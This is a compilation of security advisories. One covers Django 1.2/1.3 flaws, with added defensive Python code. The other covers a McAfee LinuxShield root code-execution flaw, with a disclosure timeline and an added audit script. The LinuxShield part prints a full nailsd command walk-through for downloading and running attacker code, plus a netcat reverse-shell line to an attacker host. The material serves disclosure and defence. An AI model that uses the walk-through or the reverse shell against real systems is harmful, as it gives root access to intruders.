Multiple security vulnerabilities in the Django development framework
Published: 2011-09-12

Affected versions:
Django 1.2.5
Django 1.3 beta 1
Django 1.2.4
Django 1.2.2
Django 1.2

Vulnerability description:

Django is an open-source web application framework written in Python.
Django has multiple security vulnerabilities that allow an attacker to obtain sensitive information, manipulate data, carry out cache poisoning attacks or cause a denial of service.
1) When a cache backend is used, session handling in django.contrib.sessions contains an error that can be exploited to manipulate session data. Successful exploitation requires that the session key is known and that the application allows the attacker to store dictionary-like objects in the cache under a valid session key.
2) Django's model system includes a field type, URLField, which checks that the supplied value is a valid URL; if the boolean keyword argument verify_exists is true, it also tries to verify that the supplied URL resolves. By default the underlying socket has no timeout, so an attacker can exploit this by supplying a specially crafted URL that consumes all of the server's memory, causing a denial of service.
3) Redirect responses are handled incorrectly when URLs supplied to a "URLField" field type are verified; an attacker can exploit this by answering with a redirect to a "file://" URL, which makes it possible to determine whether a local file exists on the server.
4) The "X-Forwarded-Host" HTTP header is handled incorrectly when the full URL for a redirect response is generated; an attacker can exploit this to carry out cache poisoning attacks.

References:
https://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/
http://secunia.com/advisories/45939/
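The four issues above have straightforward defensive counterparts. The following is an added example, not Django's own code and not part of the advisory: it is written in plain Python so it runs without Django, and the allowed hosts, the trusted proxy address and the session key prefix are constructed assumptions. It namespaces session cache keys (issue 1), verifies a URL with a socket timeout and without reading the body (issue 2), refuses redirects that leave the http(s) schemes (issue 3), and only honours X-Forwarded-Host from a trusted proxy and against a host allowlist when building an absolute redirect URL (issue 4).

```python
"""Added example (not Django's own code): defensive counterparts to the four
issues in the advisory above, in plain Python so it runs without Django.
Hosts, proxy addresses and the key prefix below are constructed assumptions."""
import socket
import urllib.error
import urllib.request
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"example.com", "www.example.com"}   # assumed: hosts this app serves
TRUSTED_PROXIES = {"10.0.0.5"}                        # assumed: reverse proxy address
SESSION_KEY_PREFIX = "django.contrib.sessions.cache"  # assumed namespace for session entries


def session_cache_key(session_key):
    """Issue 1: namespace session entries in a shared cache so a bare session key
    cannot collide with any other object the application stores there."""
    if not session_key.isalnum():
        raise ValueError("session key must be alphanumeric")
    return SESSION_KEY_PREFIX + session_key


def redirect_target_allowed(url):
    """Issue 3: only http(s) targets may be followed; a Location header pointing
    at file:// (or any other scheme) is refused rather than opened."""
    return urlsplit(url).scheme.lower() in ("http", "https")


class HttpOnlyRedirectHandler(urllib.request.HTTPRedirectHandler):
    """Redirect handler that refuses to leave the http(s) schemes."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        if not redirect_target_allowed(newurl):
            raise urllib.error.HTTPError(newurl, code, "refusing redirect to non-HTTP URL", headers, fp)
        return super().redirect_request(req, fp, code, msg, headers, newurl)


def url_exists(url, timeout=5.0):
    """Issue 2: verify a URL with a socket timeout so a slow or never-ending
    response cannot hold a worker forever. Only a HEAD request is sent and the
    body is never read, so a huge response cannot exhaust memory either."""
    if not redirect_target_allowed(url):
        raise ValueError("only http(s) URLs are verified")
    opener = urllib.request.build_opener(HttpOnlyRedirectHandler)
    request = urllib.request.Request(url, method="HEAD")
    try:
        with opener.open(request, timeout=timeout):
            return True
    except (urllib.error.URLError, socket.timeout, ValueError):
        # URLError also covers HTTPError (4xx/5xx, refused redirects) and connection failures
        return False


def effective_host(headers, remote_addr):
    """Issue 4: choose the host used to build absolute redirect URLs.
    X-Forwarded-Host is honoured only when the request came from a trusted
    proxy, and whichever host is chosen must be on the allowlist."""
    host = headers.get("Host", "")
    forwarded = headers.get("X-Forwarded-Host")
    if forwarded and remote_addr in TRUSTED_PROXIES:
        host = forwarded.split(",")[0].strip()   # first entry is the client-facing host
    hostname = host.lower()
    if hostname.startswith("["):                 # IPv6 literal such as [::1]:8000
        hostname = hostname.split("]")[0] + "]"
    elif ":" in hostname:                        # strip an explicit port
        hostname = hostname.rsplit(":", 1)[0]
    if hostname not in ALLOWED_HOSTS:
        raise ValueError("disallowed host: %r" % host)
    return host


def absolute_redirect(headers, remote_addr, path, https=True):
    """Build the absolute URL for a redirect from a validated host and a path."""
    scheme = "https" if https else "http"
    return "%s://%s%s" % (scheme, effective_host(headers, remote_addr), path)


if __name__ == "__main__":
    # Constructed requests: a direct client and one arriving through the trusted proxy.
    print(absolute_redirect({"Host": "example.com"}, "203.0.113.9", "/login/"))
    print(absolute_redirect({"Host": "10.0.0.5", "X-Forwarded-Host": "www.example.com"},
                            "10.0.0.5", "/login/"))
    print(redirect_target_allowed("file:///tmp/probe"))
```

The host check is the part that matters for cache poisoning: a reverse proxy is the only party whose forwarded host is believed, and even then the value must match a host the application actually serves, so a crafted header from a direct client never reaches the URL that ends up in a shared cache.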
McAfee LinuxShield local/remote code execution vulnerability
McAfee LinuxShield remote/local code
Affected versions: McAfee LinuxShield <= 1.5.1
Remote attack: Yes
Local overflow: Yes
Background:
===========

LinuxShield detects and removes viruses and other potentially unwanted
software on Linux-based systems. LinuxShield uses the powerful McAfee
scanning engine - the engine common to all our anti-virus products.

Although a few years ago, the Linux operating system was considered a
secure environment, it is now seeing more occurrences of software
specifically written to attack or exploit security weaknesses in
Linux-based systems. Increasingly, Linux-based systems interact with
Windows-based computers. Although viruses written to attack
Windows-based systems do not directly attack Linux systems, a Linux
server can harbor these viruses, ready to infect any client that
connects to it.

When installed on your Linux systems, LinuxShield provides protection
against viruses, Trojan horses, and other types of potentially
unwanted software.

LinuxShield scans files as they are opened and closed - a technique
known as on-access scanning. LinuxShield also incorporates an
on-demand scanner that enables you to scan any directory or file in
your host at any time.

When kept up-to-date with the latest virus-definition (DAT) files,
LinuxShield is an important part of your network security. We
recommend that you set up an anti-virus security policy for your
network, incorporating as many protective measures as possible.

LinuxShield uses a web-browser interface, and a large number of
LinuxShield installations can be centrally controlled by ePolicy
Orchestrator.

(Product description from LinuxShield Product Guide)

Description:
============

This vulnerability allows remote attackers to execute arbitrary code
on vulnerable installations of McAfee LinuxShield. User interaction
is not required to exploit this vulnerability but an attacker must
be authenticated.

The LinuxShield web interface communicates with the locally installed
"nailsd" daemon, which listens on port 65443/tcp, to do configuration
changes, query the configuration and execute tasks.

Each user who can log in to the victim box can also authenticate
itself to the "nailsd" and can do configuration changes and execute
tasks with root privileges.

A direct execution of commands is not possible, but it is possible to
download and execute code through manipulation of the config and
execution of scheduled tasks of the LinuxShield.

walk-through (after the TLS handshake):
+--------------------------------------

nailsd > +OK welcome to the NAILS Statistics Service
attacker> auth <user> <pass>
nailsd > +OK successful authentication

# Set the Attacker repository to download our code from a httpd
# (catalog.z)
#---------------------------------------------------------------
attacker> db set 1 _table=repository status=1 siteList=<?xml version="1.0" encoding="UTF-8"?><ns:SiteLists xmlns:ns="naSiteList" GlobalVersion="20030131003110" LocalVersion="20091209161903" Type="Client"><SiteList Default="1" Name="SomeGUID"><HttpSite Type="repository" Name="EvilRepo" Order="1" Server="<attackerhost>:80" Enabled="1" Local="1"><RelativePath>nai</RelativePath><UseAuth>0</UseAuth><UserName></UserName><Password Encrypted="0"/></HttpSite></SiteList></ns:SiteLists> _cmd=update
nailsd > +OK database changes buffered.

# Execute task to set the attacker repository
#---------------------------------------------------------------
attacker> task setsitelist
nailsd > +OK setting sitelist from CMA.

# Execute the default Update task to download the code
#---------------------------------------------------------------
attacker> task nstart LinuxShield Update
nailsd > +OK task LinuxShield Update starting

# Create a Scan profile, which executes our code. The profiles are
# not stored in the database.
# Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg
#---------------------------------------------------------------
attacker> sconf ODS_99 begin
nailsd > +OK 1260400888

# Set the variable "nailsd.profile.ODS_99.scannerPath" to the path
# where our earlier downloaded catalog.z file is stored.
# (/opt/McAfee/cma/scratch/update/catalog.z)
#---------------------------------------------------------------
attacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=true
    nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.ODS_99.cleanChildren=2
    nailsd.profile.ODS_99.cleansPerChild=10000
    nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/engine/dat
    nailsd.profile.ODS_99.decompArchive=true nailsd.profile.ODS_99.decompExe=true
    nailsd.profile.ODS_99.engineLibDir=/opt/NAI/LinuxShield/engine/lib
    nailsd.profile.ODS_99.enginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so
    nailsd.profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heuristicAnalysis=true
    nailsd.profile.ODS_99.macroAnalysis=true nailsd.profile.ODS_99.maxQueSize=32
    nailsd.profile.ODS_99.mime=true nailsd.profile.ODS_99.noJokes=false
    nailsd.profile.ODS_99.program=true nailsd.profile.ODS_99.quarantineChildren=1
    nailsd.profile.ODS_99.quarantineDirectory=/quarantine
    nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.profile.ODS_99.scanChildren=2
    nailsd.profile.ODS_99.scanMaxTmo=301 nailsd.profile.ODS_99.scanNWFiles=true
    nailsd.profile.ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=true
    nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scratch/update/catalog.z
    nailsd.profile.ODS_99.scansPerChild=10000 nailsd.profile.ODS_99.slowScanChildren=0
    nailsd.profile.ODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.filter.0.path=/proc
    nailsd.profile.ODS_99.filter.0.subdir=true
    nailsd.profile.ODS_99.filter.extensions.mode=all
    nailsd.profile.ODS_99.filter.extensions.type=extension
    nailsd.profile.ODS_99.action.Default.primary=Clean
    nailsd.profile.ODS_99.action.Default.secondary=Quarantine
    nailsd.profile.ODS_99.action.App.primary=Clean
    nailsd.profile.ODS_99.action.App.secondary=Quarantine
    nailsd.profile.ODS_99.action.timeout=Pass nailsd.profile.ODS_99.action.error=Block
nailsd > +OK configuration changes buffered
attacker> sconf ODS_99 commit 1260400888
nailsd > +OK configuration changes stored

# Set a scan task with the manipulated profile to execute the code
#---------------------------------------------------------------
attacker> db set 1260400888 _table=schedule taskName=Evil Task taskType=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/tmp;exclude:false timetable=type=unscheduled taskResults=0 _lastRun=1260318482 status=Stopped _cmd=insert
nailsd > +OK database changes buffered

# Execute scan task to execute the code
#---------------------------------------------------------------
attacker> task nstart Evil Task

+-------------------------------------- walk-through EOF


To get a reverse root shell place something like this in the catalog.z

--- snip ---
#!/bin/sh
nc -nv <attacker_host> 4444 -e /bin/sh
--- /snip ---


Proof of Concept :
==================

http://inj3ct0r.com/sploits/11165.tar.gz


Solution:
=========

McAfee Advisory
+--------------
https://kc.mcafee.com/corporate/index?page=content&id=SB10007


Disclosure Timeline (YYYY/MM/DD):
=================================

2009.12.07: Vulnerability found
2010.02.03: Asked vendor for a PGP key
2010.02.05: Vendor sent his PGP key
2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure
date (2010.02.18) to Vendor
2010.02.05: Vendor acknowledges the reception of the advisory
2010.02.16: Ask for a status update, because the planned release date is
2010.02.18.
2010.02.16: Vendor responds that they are currently working on a patch
2010.02.17: Changed release date to 2010.02.25.
2010.02.22: Vendor gives a status update that they are able to release
the patch on 2010.02.25.
2010.02.24: Ask for a list of affected products and the advisory url.
2010.02.24: Vendor sends the list.
2010.03.02: Release of this Advisory
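The walk-through above turns on one setting: a scan profile whose scannerPath points at a file outside the product's engine directory, so the next on-demand scan loads that file as if it were the scanner. A defender auditing a LinuxShield host can look for exactly that. The following is an added example, not part of the advisory and not McAfee's tooling: it parses "nailsd.profile.<profile>.<setting>=<value>" tokens in the form the sconf command uses, and flags every profile whose engine, DAT or scanner path leaves /opt/NAI/LinuxShield/engine. That the settings can be obtained as such tokens, that values contain no whitespace, and the sample profiles (including the benign scannerPath value for ODS_1) are assumptions.

```python
"""Added example, not part of the advisory: an audit helper for nailsd scan
profile settings. It parses nailsd.profile.<profile>.<setting>=<value> tokens
(the form used by the sconf command in the walk-through) and flags profiles
whose engine, DAT or scanner paths point outside the product's engine
directory. The token format and the sample profiles are assumptions."""
import re
from pathlib import PurePosixPath

ENGINE_DIR = "/opt/NAI/LinuxShield/engine"   # engine location from the walk-through
PATH_SETTINGS = ("scannerPath", "enginePath", "engineLibDir", "datPath")

# nailsd.profile.<profile>.<setting>=<value>; values are assumed not to contain whitespace
PROFILE_RE = re.compile(r"^nailsd\.profile\.(?P<profile>[^.]+)\.(?P<setting>.+?)=(?P<value>.*)$")

# Constructed sample: ODS_1 is a plausible default profile (its scannerPath value is
# assumed), ODS_99 mirrors the manipulated profile from the walk-through.
SAMPLE_SETTINGS = """
nailsd.profile.ODS_1.allFiles=true
nailsd.profile.ODS_1.datPath=/opt/NAI/LinuxShield/engine/dat
nailsd.profile.ODS_1.engineLibDir=/opt/NAI/LinuxShield/engine/lib
nailsd.profile.ODS_1.enginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so
nailsd.profile.ODS_1.scannerPath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so
nailsd.profile.ODS_99.allFiles=true
nailsd.profile.ODS_99.datPath=/opt/NAI/LinuxShield/engine/dat
nailsd.profile.ODS_99.engineLibDir=/opt/NAI/LinuxShield/engine/lib
nailsd.profile.ODS_99.enginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so
nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scratch/update/catalog.z
"""


def parse_profile_settings(text):
    """Group tokens by profile name: {profile: {setting: value}}."""
    profiles = {}
    for token in text.split():
        match = PROFILE_RE.match(token)
        if match:
            profiles.setdefault(match["profile"], {})[match["setting"]] = match["value"]
    return profiles


def is_under(path, root):
    """True when `path` lies inside `root` by path components. Relative paths and
    paths containing '..' are rejected, so neither string-prefix look-alikes
    (engineX/) nor traversal out of the directory pass the check."""
    candidate = PurePosixPath(path)
    if ".." in candidate.parts:
        return False
    try:
        candidate.relative_to(root)
    except ValueError:
        return False
    return True


def suspicious_profiles(text):
    """Return (profile, setting, value) triples for every path setting that
    leaves ENGINE_DIR; an on-demand scan with such a profile loads foreign code."""
    findings = []
    for name, settings in parse_profile_settings(text).items():
        for setting in PATH_SETTINGS:
            value = settings.get(setting)
            if value is not None and not is_under(value, ENGINE_DIR):
                findings.append((name, setting, value))
    return findings


if __name__ == "__main__":
    for finding in suspicious_profiles(SAMPLE_SETTINGS):
        print("profile %s: %s=%s is outside %s" % (finding + (ENGINE_DIR,)))
```

The same check belongs on the repository side of the walk-through: a siteList whose HttpSite Server is not one of the organisation's own update servers is the earlier signal, since the scan profile only becomes dangerous once the update task has fetched a file from it.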